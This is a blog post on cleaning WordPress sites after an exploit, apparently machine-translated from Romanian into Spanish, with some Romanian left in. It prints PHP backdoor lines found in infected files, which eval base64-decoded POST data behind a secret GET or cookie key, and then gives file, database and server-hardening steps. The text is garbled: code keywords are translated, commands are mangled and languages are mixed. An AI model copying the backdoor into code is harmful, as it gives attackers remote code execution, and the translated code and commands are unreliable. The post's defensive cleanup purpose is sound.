Antes de leer esta publicación debe ver La publicación aquí, para entender algo. :)
Encontré en varios archivos de blogs en shealthsetts.com, códigos similares a los siguientes, que aparecieron como resultado de virus con explotador de wordpress.:
<? php if ($ _ get [‘573ABCB060974771’] ==”8E96D1B4B674E1D2″) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?>
y
<? php if ($ _ cookie [44E827F9FBECA184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?>
En el caso anterior se trata del archivo xmlrpc.php de la Somnoliento, pero en un grep En el servidor, puede ver que hay muchos códigos de este tipo en fuentes.
Limpieza de archivos infectados:
Ooookkkkyouak
1. La mejor solución, después de que se haga respaldo-ul si curatata baza de date, este sa BORRAR fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<? php if ($ _ cookie [44E827F9FBECA184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘archivo’])); salida; }?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “* _giff”
find . -name “*_pngg”
find . -name “WP-Info.txt”
3. En /TMP , buscar y eliminar carpetas como tmpywbzt2
Limpieza SQL :
1. En la mesa wp_options Vea si existe y elimina las líneas: internal_links_cache, RIS_F541B3ABD05E7962FCAB37737F40FAD8 y WordPress_options.
2. También en wp_options, vaya a activo_plugins Y elimine si existe, un complemento que termina en una de las extensiones *_new.php, *_old.php, *.jpgg, *.giff, *.pngg o si es otra extensión sospechosa, verifique con cuidado.
3. En la mesa wp_users, vea si hay un usuario que no tiene nada que escribir a su lado, en la columna user_nicename. Elimine este usuario, pero conserve el número en la columna ID. Este usuario es posible usar "WordPress" como user_login Y parece ser creado en 00:00 0000-00-00.
4. Ve a la mesa wp_usermeta y elimine todas las líneas que pertenecen a la identificación anterior.
Después de haber realizado esta limpieza de SQL, desactive y luego active algún complemento. (en el blog -> Panel -> Complementos)
SECURITACIÓN DEL SERVER:
1. Vea qué directorios y archivos son "escondido"(Chmod 777) e intenta ponerles un chmod que ya no les permitirá escribir desde ningún nivel. (Chmod 644, por ejemplo)
encontrar . -Perm -2 –ls
2. Vea qué archivos han establecido el bit sur o patinar . Si no usa esos archivos, se les pone Chmod 0 o desinstalar el paquete que contiene. Son muy peligrosos, porque se desempeñan con los privilegios "grupo"O"raíz"Y no con los privilegios del usuario normal que ejecuta ese archivo.
Find / -Type F -Perm -04000 -ls
Find / -Type F -Perm -02000 -LS
3. Verifique qué puertos están abiertos e intente cerrar o asegurar aquellos que no se usan.
Netstat -an | Grip -i Lista
Eso es todo. Veo eso Algunos blogs son prohibidos Por Google Search y otros dicen "¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡ . Bueno, los habrían hecho ... pero ¿qué dices si Google comienza a dinero? Todos los sitios quienes hacen SE Spam y troyanos (Troyano.clicker.html) en galletas?
1 pensado en "Explotación de WordPress – Limpieza de archivos de virus, SQL y seguridad del servidor.”